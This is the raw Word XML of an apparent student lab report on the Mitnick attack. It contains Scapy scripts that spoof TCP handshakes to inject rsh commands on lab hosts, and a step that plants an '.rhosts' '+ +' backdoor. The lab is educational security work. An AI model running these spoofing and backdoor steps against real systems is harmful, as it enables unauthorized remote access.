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9F39A" w14:textId="65DD67C9" w:rsidR="00063FCA" w:rsidRDefault="00C12A22" w:rsidP="00FC122B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Configuring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680FF8AF" w14:textId="79E373D1" w:rsidR="00C12A22" w:rsidRDefault="000170F6">
      <w:r w:rsidRPr="00C12A22">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C38C41B" wp14:editId="25DF050D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4678680" cy="3352800"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="72415566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55668" name="Picture 1" descr="A screenshot of a computer screen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FAA47" w14:textId="7D660AC9" w:rsidR="00C12A22" w:rsidRDefault="00B818C2">
      <w:r w:rsidRPr="00B818C2">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EB8BB9A" wp14:editId="5DCDA590">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>609600</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3167380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4709160" cy="3322320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="73220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423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64EB3A" w14:textId="0C1B8F69" w:rsidR="00B818C2" w:rsidRDefault="00B818C2">
      <w:r w:rsidRPr="00B818C2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1634AF1C" wp14:editId="1AD03677">
            <wp:extent cx="5943600" cy="2239010"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="13950175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751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8C2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18595895" wp14:editId="0E1400BF">
            <wp:extent cx="5943600" cy="1048385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1769999575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9575" name="Picture 1" descr="A close up of a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0E5B" w14:textId="6A3D148F" w:rsidR="00FC122B" w:rsidRDefault="00FC122B" w:rsidP="00FC122B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC122B">
        <w:t>Task 1: Simulated SYN flooding</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406A5D9C" w14:textId="4DFDF941" w:rsidR="00FC122B" w:rsidRDefault="000170F6" w:rsidP="00FC122B">
      <w:r w:rsidRPr="000170F6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23500F4D" wp14:editId="01A29AD8">
            <wp:extent cx="5943600" cy="4342765"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="19300647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64774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7E95" w14:textId="3F2682D2" w:rsidR="00FB4AB4" w:rsidRDefault="000170F6" w:rsidP="00FC122B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Mac Adress : </w:t>
      </w:r>
      <w:r w:rsidRPr="000170F6">
        <w:t>02:42:0a:09:00:06</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052B567D" w14:textId="4ED331EC" w:rsidR="00E91371" w:rsidRDefault="00925B25" w:rsidP="00E91371">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB4AB4">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10F783E3" wp14:editId="4188FB89">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>632460</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>295910</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4282440" cy="2827020"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="101559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9674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371" w:rsidRPr="00E91371">
        <w:t>Task 2: Spoof TCP Connections and rsh Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CECE79" w14:textId="4EC74C9E" w:rsidR="007408B1" w:rsidRDefault="007408B1" w:rsidP="007408B1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Task 2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F7F0DD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#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE02DAC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from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5544DBBA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import subprocess, time, os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE49E8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</w:p>
    <w:p w14:paraId="3256333B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X_IP = "10.9.0.5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF83221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X_PORT = 514</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA7F1B4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SRV_IP = "10.9.0.6"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F07ECD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SRV_PORT = 1023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D5457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ERR_PORT = 9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D96D97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def find_bridge():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644E077B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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2081DA6B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out = subprocess.check_output(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A50174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"ip -br link | awk '/^br-/{print $1}'",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45359D07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shell=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D5DFDF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).decode().strip().splitlines()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFA4F0C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if out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB73B74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return out[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C709E8B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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F0653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print("[!] Bridge auto-detect failed:", e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F227118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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    return "lo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1759A8D9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IFACE = os.environ.get("IFACE") or find_bridge()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AF3B83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print(f"[i] Using iface: {IFACE}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8AF0A7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established = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033EE4E7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def send_spoofed_syn_once():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE0282B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syn = IP(src=SRV_IP, dst=X_IP)/TCP(sport=SRV_PORT, dport=X_PORT, flags="S")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871C095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send(syn, verbose=0, iface=IFACE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5DF21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print("[&gt;] Spoofed SYN sent")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197DEE60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def on_pkt(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2E963F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global established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946994D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if not (IP in pkt and TCP in pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7473CB1A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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1943A420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ip, tcp = pkt[IP], pkt[TCP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FC26E2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tcp_len = (ip.len - ip.ihl*4 - tcp.dataofs*4) if ip.len and tcp.dataofs else 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6C7BFA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print(f"{ip.src}:{tcp.sport} -&gt; {ip.dst}:{tcp.dport} Flags={tcp.flags} Len={tcp_len}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DCF16D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</w:p>
    <w:p w14:paraId="4126A0A3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if ip.src == X_IP and ip.dst == SRV_IP and tcp.sport == X_PORT and tcp.dport == SRV_PORT and tcp.flags == "SA":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ED7658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s_seq = tcp.seq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE1BB61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a_seq = tcp.ack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE2E91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print(f"[+] Got SYN+ACK SEQ={s_seq} ACK={a_seq}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AD2F3E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ack = IP(src=SRV_IP, dst=X_IP)/TCP(sport=SRV_PORT, dport=X_PORT, flags="A", seq=a_seq, ack=s_seq+1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFA2AB3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send(ack, verbose=0, iface=IFACE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0744F251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print("[+] Spoofed ACK sent")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B10C65E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data = f"{ERR_PORT}\x00seed\x00seed\x00touch /tmp/xyz\x00".encode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D970626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push = IP(src=SRV_IP, dst=X_IP)/TCP(sport=SRV_PORT, dport=X_PORT, flags="PA", seq=a_seq, ack=s_seq+1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3BF57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send(push/data, verbose=0, iface=IFACE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176036CA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print(f"[+] rsh data sent (cmd -&gt; touch /tmp/xyz, errport {ERR_PORT})")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6122901D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established = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF933D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bpf = f"tcp and src host {X_IP} and dst host {SRV_IP} and src port {X_PORT} and dst port {SRV_PORT}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C03173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print(f"[i] Sniffing filter: {bpf}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4035DBA6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print("[i] Will keep sending spoofed SYN once/sec until SYN+ACK is seen...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D384518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send_spoofed_syn_once()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BFA919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sniffer = AsyncSniffer(filter=bpf, prn=on_pkt, iface=IFACE, store=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC6F5D5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sniffer.start()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D1A660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deadline = time.time() + 30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E87AFB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lastRenderedPageBreak/>
        <w:t>while not established and time.time() &lt; deadline:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C2BB50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time.sleep(1.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1798B485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send_spoofed_syn_once()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58521E98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sniffer.stop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616C839C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if established:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B01E213" w14:textId="77777777" w:rsidR="00925B25" w:rsidRDefault="00925B25" w:rsidP="00925B25">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>] First TCP connection spoofed successfully.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324AA3AF" w14:textId="77777777" w:rsidR="00925B25" w:rsidRDefault="00925B25" w:rsidP="00925B25">
      <w:pPr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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74762D90" w14:textId="77777777" w:rsidR="00925B25" w:rsidRDefault="00925B25" w:rsidP="00925B25">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("[x] Timed out waiting for SYN+ACK. Check: trusted-server stopped, ARP static on X-Terminal, iface correct.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D24372" w14:textId="561E7193" w:rsidR="00C86C1D" w:rsidRDefault="00C86C1D" w:rsidP="00C86C1D"/>
    <w:p w14:paraId="29AC4091" w14:textId="627522A4" w:rsidR="00937C5A" w:rsidRPr="00C86C1D" w:rsidRDefault="00937C5A" w:rsidP="00937C5A">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
      </w:pPr>
      <w:r>
        <w:t>Code for spoofing the first TCP connection</w:t>
      </w:r>
      <w:r w:rsidR="00C1171B">
        <w:t>(spoof1.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613E9D5" w14:textId="600A4123" w:rsidR="007408B1" w:rsidRDefault="00C86C1D" w:rsidP="007408B1">
      <w:r w:rsidRPr="00C86C1D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0471CFC8" wp14:editId="6C48CAB8">
            <wp:extent cx="5943600" cy="2222500"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="100655315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53153" name="Picture 1" descr="A computer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4F36" w14:textId="5DE06A32" w:rsidR="00C86C1D" w:rsidRDefault="00925B25" w:rsidP="007408B1">
      <w:r w:rsidRPr="00925B25">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0556EEB0" wp14:editId="01111001">
            <wp:extent cx="5943600" cy="2884170"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183414227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42273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8482" w14:textId="6F38693F" w:rsidR="00925B25" w:rsidRDefault="00925B25" w:rsidP="007408B1">
      <w:r>
        <w:t>Proof:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E867EF" w14:textId="53A3887F" w:rsidR="00925B25" w:rsidRDefault="00925B25" w:rsidP="007408B1">
      <w:r w:rsidRPr="00925B25">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43B84C73" wp14:editId="16880CFB">
            <wp:extent cx="5943600" cy="633095"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="178967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738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277B" w14:textId="7A2D0787" w:rsidR="00925B25" w:rsidRDefault="00925B25" w:rsidP="007408B1">
      <w:r>
        <w:t>Code for spoof_eer.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7493096E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#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DDB387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from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3D118B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import subprocess, os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6D0A0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X_IP = "10.9.0.5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400E3668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SRV_IP = "10.9.0.6"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A1B07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SRV_PORT = 1023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FBE749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ERR_PORT = 9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E4AC37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def find_bridge():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAFABE0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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60616772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out = subprocess.check_output(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CA6DAA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"ip -br link | awk '/^br-/{print $1}'",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DDBFCA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shell=True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71138897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).decode().strip().splitlines()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156BEB64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if out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68320968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return out[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629FCFD1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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F47A7D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print("[!] Bridge auto-detect failed:", e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690BE706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return "lo"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AAB450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IFACE = os.environ.get("IFACE") or find_bridge()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D42074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print(f"[i] Using iface: {IFACE}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEDCF3E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def on_pkt(pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213453D8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if not (IP in pkt and TCP in pkt):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F814288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return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE25D08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ip, tcp = pkt[IP], pkt[TCP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2317DF0A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print(f"{ip.src}:{tcp.sport} -&gt; {ip.dst}:{tcp.dport} Flags={tcp.flags}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D44205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if ip.src == X_IP and ip.dst == SRV_IP and tcp.flags == "S" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF5AD49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and tcp.sport == SRV_PORT and tcp.dport == ERR_PORT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E057979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x_syn_seq = tcp.seq</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1311FA64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srv_seq = RandInt()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BF833B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synack = IP(src=SRV_IP, dst=X_IP)/TCP(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551A2B0D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sport=ERR_PORT, dport=SRV_PORT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F26989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flags="SA", seq=srv_seq, ack=x_syn_seq + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C7A87A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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9725E3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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        send(synack, verbose=0, iface=IFACE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50955FF0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print(f"[+] Sent SYN+ACK (seq={srv_seq}, ack={x_syn_seq+1}) for 2nd connection")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8E584D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bpf_ack = (f"tcp and src host {X_IP} and dst host {SRV_IP} and "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DE3AD8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           f"src port {SRV_PORT} and dst port {ERR_PORT} and tcp[tcpflags] &amp; 0x10 != 0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70844523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pkts = sniff(filter=bpf_ack, iface=IFACE, timeout=2, count=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5D334C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 if pkts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B85AD86" w14:textId="77777777" w:rsidR="00925B25" w:rsidRDefault="00925B25" w:rsidP="00925B25">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            print("[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>] Second connection ACK observed (handshake complete).")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725EA905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bpf = (f"tcp and src host {X_IP} and dst host {SRV_IP} and "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34871FA0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      f"src port {SRV_PORT} and dst port {ERR_PORT} and tcp[tcpflags] &amp; 0x02 != 0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED50BE0" w14:textId="77777777" w:rsidR="00925B25" w:rsidRDefault="00925B25" w:rsidP="00925B25">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto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print(f"[i] Sniffing for 2nd-conn SYN on {IFACE} with filter: {bpf}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E35668C" w14:textId="77777777" w:rsidR="00925B25" w:rsidRDefault="00925B25" w:rsidP="00925B25">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>sniff(filter=bpf, prn=on_pkt, iface=IFACE, store=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A2FE3" w14:textId="51C24445" w:rsidR="0020595C" w:rsidRPr="0020595C" w:rsidRDefault="0020595C" w:rsidP="003B6253">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Task 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76918D23" w14:textId="36323AD7" w:rsidR="00E91371" w:rsidRDefault="0020595C" w:rsidP="00E91371">
      <w:r>
        <w:t xml:space="preserve">Change </w:t>
      </w:r>
      <w:r w:rsidRPr="0020595C">
        <w:t>data = b"9090\x00seed\x00seed\x00touch /tmp/xyz\x00"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="0020595C">
        <w:t>data = b"9090\x00seed\x00seed\x00echo + + &gt; /home/seed/.rhosts\x00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C7141" w14:textId="1AA8D82A" w:rsidR="003B6253" w:rsidRPr="00E91371" w:rsidRDefault="003B6253" w:rsidP="00E91371">
      <w:r w:rsidRPr="003B6253">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42DEB97A" wp14:editId="58225C9C">
            <wp:extent cx="5943600" cy="1136015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="189847237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72371" name="Picture 1" descr="A close-up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253">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="672201D1" wp14:editId="6666BEC4">
            <wp:extent cx="5943600" cy="2500630"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16480411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4114" name="Picture 1" descr="A screenshot of a computer erro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253">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A798EDC" wp14:editId="53692FED">
            <wp:extent cx="5943600" cy="1492885"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="216540159" name="Picture 1" descr="A close-up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40159" name="Picture 1" descr="A close-up of a computer erro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253" w:rsidRPr="00E91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754"/>
    <w:rsid w:val="000170F6"/>
    <w:rsid w:val="00063FCA"/>
    <w:rsid w:val="0020595C"/>
    <w:rsid w:val="003B6253"/>
    <w:rsid w:val="004E3DB4"/>
    <w:rsid w:val="0057303B"/>
    <w:rsid w:val="007408B1"/>
    <w:rsid w:val="00797857"/>
    <w:rsid w:val="00842E42"/>
    <w:rsid w:val="00925B25"/>
    <w:rsid w:val="00937C5A"/>
    <w:rsid w:val="00A252C9"/>
    <w:rsid w:val="00AE2895"/>
    <w:rsid w:val="00B807D5"/>
    <w:rsid w:val="00B818C2"/>
    <w:rsid w:val="00C1171B"/>
    <w:rsid w:val="00C12A22"/>
    <w:rsid w:val="00C86C1D"/>
    <w:rsid w:val="00D44754"/>
    <w:rsid w:val="00E746E0"/>
    <w:rsid w:val="00E91371"/>
    <w:rsid w:val="00EA5479"/>
    <w:rsid w:val="00FB4AB4"/>
    <w:rsid w:val="00FC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B4D09"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{30B26449-1123-4462-BCB9-71F7A0E05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7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47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47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7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7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7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7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7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7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7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447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447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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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7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693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2025-09-15T17:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-15T19:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>